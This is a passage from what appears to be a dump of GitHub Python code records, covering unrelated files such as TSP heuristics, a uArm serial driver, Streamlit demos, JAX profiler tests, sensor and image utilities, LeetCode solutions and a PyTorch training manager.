spec, to calculate the cost of the\n # current tour (as represented by self.perm).\n def tourValue(self):\n totalCost = 0\n for x in range (self.n):\n totalCost += self.dists[self.perm[x]][self.perm[(x+1)%self.n]] #Modulo to wraparound\n return totalCost\n \n \n # Below are given functions \n def swapHeuristic(self):\n better = True\n while better:\n better = False\n for i in range(self.n):\n if self.trySwap(i):\n better = True\n \n\n def TwoOptHeuristic(self):\n better = True\n while better:\n better = False\n for j in range(self.n-1):\n for i in range(j):\n if self.tryReverse(i,j):\n better = True\n # End of given functions\n \n # Attempt the swap of cities i and i+1 in self.perm and commit\n # commit to the swap if it improves the cost of the tour.\n # Return True/False depending on success.\n def trySwap(self,i):\n \n normalCost = self.dists[self.perm[i]][self.perm[(i-1)%self.n]] #calculating cost of original permutation \n normalCost += self.dists[self.perm[(i+2)%self.n]][self.perm[(i+1)%self.n]]\n #calculating cost of swap only at the swap location to avoid expensive algorithm (by calling tourValue each time)\n changedCost = self.dists[self.perm[i]][self.perm[(i+2)%self.n]]\n changedCost += self.dists[self.perm[(i+1)%self.n]][self.perm[(i-1)%self.n]]\n \n if (changedCost < normalCost): #performing swap if 
cost is less\n #saving current values\n a = self.perm[i]\n b = self.perm[(i+1)%self.n]\n #performing the swap\n self.perm[i] = b\n self.perm[(i+1)%self.n] = a\n return True\n else:\n return False\n\n\n # Consider the effect of reversiing the segment between\n # self.perm[i] and self.perm[j], and commit to the reversal\n # if it improves the tour value.\n # Return True/False depending on success. \n # \n def tryReverse(self,i,j):\n normalCost = self.dists[self.perm[i]][self.perm[(i-1)%self.n]] #calculating cost of original permutation \n normalCost += self.dists[self.perm[j]][self.perm[(j+1)%self.n]]\n #calculating cost of swap only at the swap location to avoid expensive algorithm (by calling tourValue each time)\n changedCost = self.dists[self.perm[j]][self.perm[(i-1)%self.n]] \n changedCost += self.dists[self.perm[i]][self.perm[(j+1)%self.n]]\n \n if (changedCost>> import serial\n>>> import uarm_serial\n>>> conn = serial.serial_for_url()\n>>> arm = uarm_serial.uArmSerial(conn)\n\nYou are now connected to the arm.\n\n>>> arm.attach_all()\nThis will enable all serial motors - it is not the default - you may want to relax\nthem to save power, or so the open feedack potentiometers can be used as sensors.\nSee the demo functions at the bottom for examples of movement.\ndemo_setup is currently configured for my own test machine.\n\"\"\"\n\nimport serial\nfrom functools import partial\nimport logging\n\nclass uArmSerial(object):\n def __init__(self, serial_conn):\n \"\"\"Params - a connected serial port going to the\n Arduino on the uArm running uARm serial\"\"\"\n self._serial_conn = serial_conn\n self._serial_conn.timeout = 0.1\n self.gripper = partial(self._safe_position, 90, 40, 0)\n self.wrist = partial(self._safe_position, 120, 0, 1)\n self.base = partial(self._safe_position, 120, 30, 2)\n self.elbow = partial(self._safe_position, 90, 10, 3)\n self.shoulder = partial(self._safe_position, 110, 30, 4)\n self.clear = True\n #todo determine limits\n #todo - read pots\n #todo cal, and store/read cal data\n self.clear_response()\n\n def _write_conn(self, data):\n logging.info(data)\n self._serial_conn.write(\n bytes(data, 'utf-8')\n )\n\n# def decode_lines(self, lines):\n# \"\"\"Decodes list of utf-8 bytearrays\"\"\"\n# lines_decoded\n \n def clear_response(self, force=True):\n if self.clear or force:\n output = self._serial_conn.readlines()\n output = [line.decode('utf-8') for line in output]\n output = ''.join(output)\n if output:\n logging.info( \"Flushing...\\n%s\", output)\n logging.info(\"Flushed\")\n \n def _write_motor(self, motor_number, position):\n \"\"\"Format a serial string and send it\"\"\"\n cmd = \"P%d,%d;\" % (motor_number, position)\n self._write_conn(cmd)\n\n def attach(self, joint_no):\n \"\"\"Attach a servo (power it)\"\"\"\n cmd = \"A%d;\" % (joint_no)\n self._write_conn(cmd)\n self.clear_response()\n\n def detach(self, joint_no):\n \"\"\"Detach servo - save power, or become sense only\"\"\"\n cmd = \"D%d;\" % (joint_no)\n self._write_conn(cmd)\n self.clear_response()\n \n def detach_all(self):\n \"\"\"Detach all - good for record\"\"\"\n [self.detach(n) for n in range(5)]\n\n def attach_all(self):\n [self.attach(n) for n in range(5)]\n \n def read_pot(self, pot_no):\n \"\"\"Read a potentiometer on the arm\"\"\"\n self.clear(force=True)\n cmd = \"?%d;\" % (pot_no)\n self._write_conn(cmd)\n response = ''.join(self._serial_conn.readlines()).decode('utf-8')\n logging.info(response)\n response = response[1].strip()\n return int(response)\n \n def _safe_position(self, high, 
low, motor_no, position):\n assert low <= position <= high\n self._write_motor(motor_no, position)\n \nimport time\n\ndef go_demo(arm):\n arm.gripper(40)\n arm.shoulder(90)\n arm.elbow(90)\n time.sleep(1)\n arm.shoulder(30)\n arm.elbow(60)\n time.sleep(1)\n arm.gripper(90)\n time.sleep(1)\n arm.shoulder(90)\n time.sleep(0.4)\n arm.elbow(90)\n \n\ndef demo_setup():\n logging.basicConfig(level=logging.INFO)\n import platform\n if 'linux' in platform.platform().lower():\n conn = serial.serial_for_url(\"/dev/ttyUSB0\")\n conn.baudrate = 9600\n else:\n conn = serial.serial_for_url(\"COM4:9600\")\n conn.timeout = 0.1\n found_ready = False\n while not found_ready:\n data = [line.decode('utf-8') for line in conn.readlines()]\n data = ''.join(data)\n found_ready = 'Ready' in data\n if data:\n print(data)\n \n arm = uArmSerial(conn)\n arm.attach_all()\n arm.wrist(87)\n arm.clear = False\n go_demo(arm)\n conn.close()\n \n\n# demo_setup()\n# import time\n# \n# try:\n# arm = uArmSerial(conn)\n# while True:\n# logging.info( [arm.read_pot(n) for n in range(5)])\n# time.sleep(0.1)\n# arm.gripper(10)\n# time.sleep(1)\n# arm.gripper(80)\n# arm.read_pot(0)\n# finally:\n# conn.close()\n","repo_name":"orionrobots/armbot","sub_path":"uarm_serial.py","file_name":"uarm_serial.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10051865328","text":"from sre_constants import SUCCESS\nimport streamlit as st\n\n#1 create widget\nimport time\nst.balloons()\nst.progress(100)\nwith st.spinner(\"Loading\"): time.sleep(2)\n\nst.success(\"Success\")\nst.error(\"Error\")\nst.warning(\"Warning\")\nst.info(\"It's easy to build app with streamlit\")\nst.exception(RuntimeError(\"RuntimeError exception\"))\n\n#2 create sidebar \nst.sidebar.title(\"Streamlit Learning\")\nst.sidebar.button(\"Module 1\")\nst.sidebar.radio(\"Module\",[\"1\",\"2\",\"3\"])\n\n#3 widgte\nst.checkbox('yes')\nst.button(\"click\")\nst.radio(\"Gender\",[\"Male\",\"Female\"])\nst.selectbox(\"Gender\",[\"Male\",\"Female\"])\nst.multiselect(\"Gender\",[\"Male\",\"Female\",\"Other\"])\nst.select_slider(\"Gender\",[\"Male\",\"Female\",\"Other\"])\nst.slider('Number',0,50)\n\n#6 formula math\nst.markdown(\"markdown\")\nst.code(\"x=2022\")\nst.latex(r'''a+a r^1+a r^2+a r^3 ''') # untuk nulis persamaan\n\n\n#9 line chart\nimport pandas as pd\nimport numpy as np\ndf = pd.DataFrame(\n np.random.randn(10,2),\n columns=[\"x\",\"y\"])\nst.line_chart(df)\n\n#12 area chart\ndf=pd.DataFrame(\n np.random.randn(10,2),\n columns=[\"x\",\"y\"])\nst.area_chart(df)\n\n#13 Map\ndf=pd.DataFrame(np.random.randn(500,2)/[50,50]+[37.76, -122.4],\ncolumns=['lat','lon'])\nst.map(df)\n","repo_name":"ryryrizki/streamlit","sub_path":"Latihan1.py","file_name":"Latihan1.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17056622767","text":"from functools import partial\nimport glob\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport threading\nimport time\nimport unittest\nfrom absl.testing import absltest\n\nimport jax\nimport jax.numpy as jnp\nimport jax.profiler\nfrom jax import config\nfrom jax._src.lib import xla_extension_version\nimport jax._src.test_util as jtu\n\ntry:\n import portpicker\nexcept ImportError:\n portpicker = None\n\ntry:\n from tensorflow.python.profiler import profiler_client\n from tensorflow.python.profiler import profiler_v2 as 
tf_profiler\nexcept ImportError:\n profiler_client = None\n tf_profiler = None\n\nTBP_ENABLED = False\ntry:\n import tensorboard_plugin_profile\n del tensorboard_plugin_profile\n TBP_ENABLED = True\nexcept ImportError:\n pass\n\nconfig.parse_flags_with_absl()\n\n\nclass ProfilerTest(unittest.TestCase):\n # These tests simply test that the profiler API does not crash; they do not\n # check functional correctness.\n\n def setUp(self):\n super().setUp()\n self.worker_start = threading.Event()\n self.profile_done = False\n\n @unittest.skipIf(not portpicker, \"Test requires portpicker\")\n def testStartStopServer(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port=port)\n del port\n jax.profiler.stop_server()\n\n @unittest.skipIf(not portpicker, \"Test requires portpicker\")\n def testCantStartMultipleServers(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port=port)\n port = portpicker.pick_unused_port()\n with self.assertRaisesRegex(\n ValueError, \"Only one profiler server can be active at a time.\"):\n jax.profiler.start_server(port=port)\n jax.profiler.stop_server()\n\n def testCantStopServerBeforeStartingServer(self):\n with self.assertRaisesRegex(ValueError, \"No active profiler server.\"):\n jax.profiler.stop_server()\n\n def testProgrammaticProfiling(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n try:\n jax.profiler.start_trace(tmpdir)\n jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(\n jnp.ones(jax.local_device_count()))\n finally:\n jax.profiler.stop_trace()\n\n proto_path = glob.glob(os.path.join(tmpdir, \"**/*.xplane.pb\"),\n recursive=True)\n self.assertEqual(len(proto_path), 1)\n with open(proto_path[0], \"rb\") as f:\n proto = f.read()\n # Sanity check that serialized proto contains host, device, and\n # Python traces without deserializing.\n self.assertIn(b\"/host:CPU\", proto)\n if jtu.test_device_matches([\"tpu\"]):\n self.assertIn(b\"/device:TPU\", proto)\n self.assertIn(b\"pxla.py\", proto)\n\n def testProfilerGetFDOProfile(self):\n if xla_extension_version < 206:\n raise unittest.SkipTest(\"API version < 206\")\n # Tests stop_and_get_fod_profile could run.\n try:\n jax.profiler.start_trace(\"test\")\n jax.pmap(lambda x: jax.lax.psum(x + 1, \"i\"), axis_name=\"i\")(\n jnp.ones(jax.local_device_count())\n )\n finally:\n fdo_profile = jax._src.profiler.stop_and_get_fdo_profile()\n if jtu.test_device_matches([\"gpu\"]) and jtu.is_device_cuda():\n self.assertIn(b\"copy\", fdo_profile)\n\n def testProgrammaticProfilingErrors(self):\n with self.assertRaisesRegex(RuntimeError, \"No profile started\"):\n jax.profiler.stop_trace()\n\n try:\n with tempfile.TemporaryDirectory() as tmpdir:\n jax.profiler.start_trace(tmpdir)\n with self.assertRaisesRegex(\n RuntimeError,\n \"Profile has already been started. 
Only one profile may be run at a \"\n \"time.\"):\n jax.profiler.start_trace(tmpdir)\n finally:\n jax.profiler.stop_trace()\n\n def testProgrammaticProfilingContextManager(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n with jax.profiler.trace(tmpdir):\n jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(\n jnp.ones(jax.local_device_count()))\n\n proto_path = glob.glob(os.path.join(tmpdir, \"**/*.xplane.pb\"),\n recursive=True)\n self.assertEqual(len(proto_path), 1)\n with open(proto_path[0], \"rb\") as f:\n proto = f.read()\n # Sanity check that serialized proto contains host and device traces\n # without deserializing.\n self.assertIn(b\"/host:CPU\", proto)\n if jtu.test_device_matches([\"tpu\"]):\n self.assertIn(b\"/device:TPU\", proto)\n\n def testTraceAnnotation(self):\n x = 3\n with jax.profiler.TraceAnnotation(\"mycontext\"):\n x = x + 2\n\n def testTraceFunction(self):\n @jax.profiler.annotate_function\n def f(x, *, y):\n return x + 2 * y\n self.assertEqual(f(7, y=3), 13)\n\n @jax.profiler.annotate_function\n def f(x, *, name):\n return x + 2 * len(name)\n self.assertEqual(f(7, name=\"abc\"), 13)\n\n @partial(jax.profiler.annotate_function, name=\"aname\")\n def g(x):\n return x + 2\n self.assertEqual(g(7), 9)\n\n @partial(jax.profiler.annotate_function, name=\"aname\", akwarg=\"hello\")\n def h(x):\n return x + 2\n self.assertEqual(h(7), 9)\n\n def testDeviceMemoryProfile(self):\n x = jnp.ones((20,)) + 7.\n self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)\n del x\n\n def _check_xspace_pb_exist(self, logdir):\n path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')\n self.assertEqual(1, len(glob.glob(path)),\n 'Expected one path match: ' + path)\n\n @unittest.skip(\"Test causes OOMs\")\n @unittest.skipIf(not (portpicker and profiler_client and tf_profiler),\n \"Test requires tensorflow.profiler and portpicker\")\n def testSingleWorkerSamplingMode(self, delay_ms=None):\n def on_worker(port, worker_start):\n jax.profiler.start_server(port)\n worker_start.set()\n x = jnp.ones((1000, 1000))\n while True:\n with jax.profiler.TraceAnnotation(\"atraceannotation\"):\n jnp.dot(x, x.T).block_until_ready()\n if self.profile_done:\n jax.profiler.stop_server()\n break\n\n def on_profile(port, logdir, worker_start):\n worker_start.wait()\n options = tf_profiler.ProfilerOptions(\n host_tracer_level=2,\n python_tracer_level=2,\n device_tracer_level=1,\n delay_ms=delay_ms,\n )\n\n # Request for 1000 milliseconds of profile.\n duration_ms = 1000\n profiler_client.trace(f'localhost:{port}', logdir, duration_ms,\n '', 1000, options)\n self.profile_done = True\n\n logdir = absltest.get_default_test_tmpdir()\n # Remove any existing log files.\n shutil.rmtree(logdir, ignore_errors=True)\n port = portpicker.pick_unused_port()\n thread_profiler = threading.Thread(\n target=on_profile, args=(port, logdir, self.worker_start))\n thread_worker = threading.Thread(\n target=on_worker, args=(port, self.worker_start))\n thread_worker.start()\n thread_profiler.start()\n thread_profiler.join()\n thread_worker.join(120)\n self._check_xspace_pb_exist(logdir)\n\n @unittest.skipIf(\n not (portpicker and profiler_client and tf_profiler and TBP_ENABLED),\n \"Test requires tensorflow.profiler, portpicker and \"\n \"tensorboard_profile_plugin\")\n def test_remote_profiler(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port)\n\n logdir = absltest.get_default_test_tmpdir()\n # Remove any existing log files.\n shutil.rmtree(logdir, 
ignore_errors=True)\n def on_profile():\n os.system(\n f\"{sys.executable} -m jax.collect_profile {port} 500 \"\n f\"--log_dir {logdir} --no_perfetto_link\")\n\n thread_profiler = threading.Thread(\n target=on_profile, args=())\n thread_profiler.start()\n start_time = time.time()\n y = jnp.zeros((5, 5))\n while time.time() - start_time < 10:\n y = jnp.dot(y, y)\n jax.profiler.stop_server()\n thread_profiler.join()\n self._check_xspace_pb_exist(logdir)\n\nif __name__ == \"__main__\":\n absltest.main(testLoader=jtu.JaxTestLoader())\n","repo_name":"google/jax","sub_path":"tests/profiler_test.py","file_name":"profiler_test.py","file_ext":"py","file_size_in_byte":7983,"program_lang":"python","lang":"en","doc_type":"code","stars":25647,"dataset":"github-code","pt":"94"} +{"seq_id":"36213726717","text":"from typing import List\n\n\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\n\nclass NAryTreeLevelOrderTraversal:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n q, ret = [root], []\n while any(q):\n ret.append([node.val for node in q])\n q = [child for node in q for child in node.children if child]\n return ret\n\n def levelOrder2(self, root: 'Node') -> List[List[int]]:\n # 当做队列\n q = [root]\n res = []\n while q:\n temp = []\n next_stack = []\n for node in q:\n temp.append(node.val)\n for child in node.children:\n next_stack.append(child)\n res.append(temp)\n q = next_stack\n return res\n","repo_name":"jacksonyoudi/AlgorithmCode","sub_path":"PyProject/leetcode/history/n-ary-tree-level-order-traversal.py","file_name":"n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"20417094509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 20 20:57:50 2021\n\n@author: carlos\n\"\"\"\n#%% ------------------------------DATA-----------------------------------------\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Telescope:\nD = 0.5 # m\nf_D = 15 \nF = f_D*D\n# Lents and collimator:\nf_1 = 220e-3 # m\nd_1 = 38e-3 # m \nf_d_1 = f_1/d_1\nf_2 = 220e-3 # m\nd_2 = 38e-3 # m \nf_d_2 = f_2/d_2\n#print(f_D_l)\n# Grid\nlenth = 40 # mm\nsigma_1 = 300 # lines/mm\nBlaze = 5 # º\nBlaze_SI = Blaze*np.pi/180\nalpha = 0 \nseeing = 1 # \"\nlam = 5000 # \\AA\n# Detector: \nL = 150 # pixels \nl = 15 # microns/pixel\nl *= 1e-6 # m/pixel\n# In[i] Ancho del filtro\n\nsigma = 1/sigma_1\n\nbeta = 2*Blaze_SI\n\n# Orden en que lam tiene la máxima eficiencia \n\nm = sigma*1e7/lam*(np.sin(alpha)+np.sin(2*Blaze_SI+alpha))\nlam_max = sigma*1e7/int(m)*(np.sin(alpha)+np.sin(2*Blaze_SI+alpha))\n\n# Pureza espectral libre, de acuerdo con la f: \n \nD_lam = 2*lam/(2*int(m)+3)\n\n# Considerando un criterio de ancho de filtro de +-1/3 o +-1/4:\nprint('Ancho del filtro ',D_lam,'\\AA')\n\n\n# In[ii] Pureza espectral dada por la red\nBeta = np.arcsin(int(m)*lam*1e-7/sigma)\n\ndl = lambda r_1, w_1, A_1: r_1*w_1/A_1/f_1\n\n# Ángulo subtendido por la rendija sobre el cielo:\nPhi = seeing/3600 # deg\nPhi *= np.pi/180 # rad\n\n# CONSIDERANDO QUE LA RED NO ESTÁ TOTALMENTE ILUMINADA:\n \nW = f_1/f_D # m. Diámetro del cono de luz que ilumina el colimador. \nBeta = np.arcsin(int(m)*lam*1e-7/sigma) # Ángulo Beta, sacado de la ecuación de red. \n\nR = W*(np.sin(Beta)+np.sin(alpha))/Phi/D # Ec. 
13.2.5 del Astronomical Optics\nd_lam = lam/R\nprint('Pureza espectral dada por la red: ',d_lam,'\\AA')\n\n\n\n# In[iii]\n# Dispersión angular:\n#A1 = (np.sin(alpha)+np.sin(beta))/np.cos(beta)/lam # rad/\\AA\nA = int(m)/np.cos(beta)/sigma #rad/mm\nA *= 1e-7 # rad/\\AA\n# Dispersión lineal:\nP_1 = A*f_2 # m/\\AA\n\n# Tamaño del detector CCD:\nT = L*l # m\n\n# Rango espectral cubierto por el detector:\nD_lam = T/P_1\nprint('Rango espectral cubierto por el detector CCD: ', D_lam,'\\AA')\n\nD_lam_pix = D_lam/L\n# ¿Cumple el teorema del muestreo?\nprint('Si cumple el teorema del muestreo: ',2*D_lam_pix\"\n","repo_name":"jwphantom/tp_2_python_for_data_science","sub_path":"app/models/town.py","file_name":"town.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28590180635","text":"from PIL import Image\n\nfrom scythe.base import BaseSingleFileExtractor\n\n\nclass ImageExtractor(BaseSingleFileExtractor):\n \"\"\"Retrieves basic information about an image\"\"\"\n\n def _extract_file(self, file_path, context=None):\n im = Image.open(file_path)\n return {\n \"image\": {\n \"width\": im.width,\n \"height\": im.height,\n \"format\": im.format,\n \"megapixels\": (im.width * im.height) / 1000000,\n \"shape\": [\n im.height,\n im.width,\n len(im.getbands())\n ]\n }\n }\n\n def implementors(self):\n return ['Jonathon Gaff']\n\n def version(self):\n return '0.0.2'\n","repo_name":"materials-data-facility/scythe","sub_path":"scythe/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"70395876789","text":"import sys\n\nN = int(input())\nM = int(input())\narr = []\nnum = 1\nfor line in sys.stdin:\n a, b = map(int, line.strip().split())\n # 모든 노선을 한쪽 방향으로 통일\n if a > b:\n b += N\n # 도착지점을 먼 순서로 정렬하기 위해 음수로 삽입\n arr.append((a, -b, num))\n num += 1\n\n\ntmp = []\nbea = beb = -1\nfor a, b, n in sorted(arr):\n b = -b\n # 시작지점이 동일한 경우는 도착지점이 가장 먼 노드만 남겨놓음\n # 이전 노선에서의 가장 먼 도착지점보다 현재 노선의 가장 먼 도착지점이 가까울 경우 해당 노선 모두 제외\n if a == bea or b <= beb:\n continue\n bea, beb = a, b\n tmp.append((a, b, n))\n\n# 마지막 노선이 덮을 수 있는 노선들을 확인\nanswer = []\nfor a, b, n in tmp:\n if b + N > beb:\n answer.append(n)\nprint(' '.join(map(str, sorted(answer))))","repo_name":"bconfiden2/daily-ps","sub_path":"boj/2022/08.August/10165.py","file_name":"10165.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41472714372","text":"import PhotoCtrl\nimport detect\nimport logging\nimport PiConf\n\nclass HaarDetectCtrl:\n\n cascade = PiConf.CAT_CASCADE\n\n def structure(self,rects):\n if rects is None:\n return []\n ret = []\n for r in rects:\n if len(r) < 4:\n continue\n R = {\"x\" : r[0], \"y\" : r[1], \"w\" : r[2], \"h\" : r[3]}\n ret.append(R)\n logging.debug(ret)\n return ret\n\n def detect_file(self, path):\n pic, rects = detect.handleFile(path, self.cascade)\n logging.debug(\"Detected on\" + path + \": \" + str(rects))\n return self.structure(rects)\n\n\n\n def do_detect(self, img):\n path = PiConf.PHOTO_PATH + \"/\" + img + \".jpg\"\n return self.detect_file(path)\n \n\n\n\ndef createDetectCtrl():\n return HaarDetectCtrl()\n\n\nif __name__ == '__main__':\n D = createDetectCtrl()\n p = \"test/data/cat.jpg\"\n rc = D.detect_file(p)\n print 
(rc)","repo_name":"tprlab/pitanq","sub_path":"HaarDetectCtrl.py","file_name":"HaarDetectCtrl.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"94"} +{"seq_id":"7436456420","text":"import argparse\r\nimport datetime\r\nimport json\r\nimport logging\r\nimport uuid\r\nimport serial\r\n\r\nfrom os.path import normpath, join\r\n\r\nlogging.basicConfig(format='%(asctime)-15s %(message)s')\r\nlogger = logging.getLogger('serial-reader')\r\nlogger.setLevel(level=logging.INFO)\r\nlogger.info('serial-reader started')\r\n\r\nparser = argparse.ArgumentParser(description='Device Data Serial Reader.')\r\nparser.add_argument('--serial', nargs=1, type=str, required=True, help='serial port address')\r\nparser.add_argument('--dir', nargs=1, type=str, required=True, help='directory to save messages')\r\nargs = parser.parse_args()\r\nsport = args.serial[0]\r\nmdir = args.dir[0]\r\n\r\nlogger.info('Reading from ' + sport)\r\nser = serial.Serial(sport, 9600)\r\nwhile True:\r\n data = ser.readline()\r\n logger.debug(data)\r\n logger.info('{0} bytes read'.format(len(data)))\r\n msg = int(data)\r\n logger.debug(msg)\r\n deviceId = msg >> 28 & 0xF\r\n logger.debug('deviceId: ' + str(deviceId))\r\n curtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n fname = str(uuid.uuid1())\r\n jm = ''\r\n if deviceId == 0:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'distance': (msg >> 16) & 0xFFF,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 1:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'humidity': (msg >> 21) & 0x7F,\r\n 'temperature': (msg >> 15) & 0x3F,\r\n 'rain': (msg >> 13) & 0x3,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 2:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'humidity': (msg >> 16) & 0xFFF,\r\n 'temperature': msg & 0xFFFF,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 3:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'pressure': (msg >> 12) & 0x3FF,\r\n 'temperature': (msg >> 22) & 0x3F,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n else:\r\n logger.error('Unsupported deviceId ' + str(deviceId) + ', message: ' + str(data))\r\n continue\r\n f = open(normpath(join(mdir, fname)), \"w\")\r\n f.write(jm)\r\n f.close()\r\n logger.info('Saved sensor data to file {0}'.format(fname))","repo_name":"subzero0x1/Sensors","sub_path":"data-server/serial-reader.py","file_name":"serial-reader.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30782213221","text":"#\n# @lc app=leetcode id=317 lang=python3\n#\n# [317] Shortest Distance from All Buildings\n#\n# https://leetcode.com/problems/shortest-distance-from-all-buildings/description/\n#\n# algorithms\n# Hard (40.84%)\n# Likes: 732\n# Dislikes: 42\n# Total Accepted: 63.9K\n# Total Submissions: 156.4K\n# Testcase Example: '[[1,0,2,0,1],[0,0,0,0,0],[0,0,1,0,0]]'\n#\n# You want to build a house on an empty land which reaches all buildings in the\n# shortest amount of distance. You can only move up, down, left and right. 
You\n# are given a 2D grid of values 0, 1 or 2, where:\n# \n# \n# Each 0 marks an empty land which you can pass by freely.\n# Each 1 marks a building which you cannot pass through.\n# Each 2 marks an obstacle which you cannot pass through.\n# \n# \n# Example:\n# \n# \n# Input: [[1,0,2,0,1],[0,0,0,0,0],[0,0,1,0,0]]\n# \n# 1 - 0 - 2 - 0 - 1\n# | | | | |\n# 0 - 0 - 0 - 0 - 0\n# | | | | |\n# 0 - 0 - 1 - 0 - 0\n# \n# Output: 7 \n# \n# Explanation: Given three buildings at (0,0), (0,4), (2,2), and an obstacle at\n# (0,2),\n# ⁠ the point (1,2) is an ideal empty land to build a house, as the\n# total \n# travel distance of 3+3+1=7 is minimal. So return 7.\n# \n# Note:\n# There will be at least one building. If it is not possible to build such\n# house according to the above rules, return -1.\n# \n#\n\n# @lc code=start\ndef bfs(next_pos, grid):\n visited = set()\n houses_reached = 0\n while next_pos:\n r, c, steps = next_pos.popleft()\n curr_steps, paths = grid[r][c]\n if paths <= -1:\n if paths == -1:\n houses_reached += 1\n continue\n elif (r, c) in visited:\n continue\n visited.add((r, c))\n grid[r][c] = (curr_steps + steps, paths + 1)\n steps += 1\n next_pos.append((r-1, c, steps))\n next_pos.append((r, c-1, steps))\n next_pos.append((r+1, c, steps))\n next_pos.append((r, c+1, steps))\n return houses_reached\n \n\nclass Solution:\n def shortestDistance(self, grid_og: 'List[List[int]]') -> 'int':\n n = len(grid_og)\n m = len(grid_og[0])\n houses = []\n max_val = n*m*n*m + 1\n grid = [[(max_val, -2) for i in range(m + 2)]]\n for r in range(n):\n row = []\n row.append((max_val, -2))\n for c in range(m):\n pos_val = (max_val, -2)\n if grid_og[r][c] == 1:\n houses.append((r+1, c+1)) \n pos_val = (max_val, -1)\n elif grid_og[r][c] == 0:\n pos_val = (0, 0)\n row.append(pos_val)\n row.append((max_val, -2))\n grid.append(row)\n grid.append([(max_val, -2) for i in range(m + 2)])\n houses_num = len(houses)\n for house in houses:\n initial_queue = collections.deque([\n (house[0]-1, house[1], 1),\n (house[0], house[1]-1, 1),\n (house[0]+1, house[1], 1),\n (house[0], house[1]+1, 1),\n ])\n if houses_num > bfs(initial_queue, grid):\n return -1\n min_dist = max_val\n for r in range(1, n+1):\n for c in range(1, m+1):\n steps, paths = grid[r][c]\n if paths == houses_num:\n min_dist = min(min_dist, steps)\n return min_dist\n# @lc code=end\n","repo_name":"Diego-Zulu/leetcode_answers","sub_path":"python3/317.shortest-distance-from-all-buildings.209750093.ac.py","file_name":"317.shortest-distance-from-all-buildings.209750093.ac.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24507844758","text":"\n\ndef get_rating_stars_class(rating):\n if not rating:\n return u\"s00\"\n parts = list(divmod(rating, 1))\n parts[0] = int(parts[0])\n if parts[1] < 0.2:\n parts[1] = 0\n elif parts[1] > 0.8:\n parts[0] += 1\n parts[1] = 0\n else:\n parts[1] = 5\n return \"s%i%i\" % tuple(parts)","repo_name":"colinbdclark/OER-Commons","sub_path":"apps/rating/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"18955722423","text":"\"\"\"\nModel Manager Class which helps setting up the model for training\n\"\"\"\nimport torch\nfrom torch import nn\nfrom utils.utils import init_environment\nfrom network.resnet51 import resnet51\nfrom network.arcface import ArcFace\nfrom collections import 
OrderedDict\n\n\n\nclass ModelManager():\n \"\"\"\n Model Manager Class\n \"\"\"\n\n def __init__(self, config):\n \"\"\"\n Init Model Manager\n :param config: DotMap Configuration\n \"\"\"\n self.config = config\n self._check_config_parameters()\n\n self.device = init_environment(config)\n\n # if resume training model, load checkpoint\n if self.config.training.resume:\n self.old_checkpoint, self.state_dict = self._get_checkpoint()\n\n # choose to compute parallel or not\n if self.config.training.parallel:\n # Get model for training on multiple GPUs\n self.model = nn.DataParallel(self._create_model().to(self.device), \n device_ids=[int(x[-1]) for x in self.config.basic.cuda_device_name.split(',')])\n else:\n self.model = self._create_model().to(self.device)\n\n\n def _check_config_parameters(self):\n if not isinstance(self.config.training.optimizer.learning_rate, float):\n raise ValueError\n elif not isinstance(self.config.training.optimizer.weight_decay, float):\n raise ValueError\n elif not isinstance(self.config.preprocessing.dataloader.batch_size, int):\n raise ValueError\n elif not isinstance(self.config.training.epochs, int):\n raise ValueError\n elif not isinstance(self.config.training.early_stop, int):\n raise 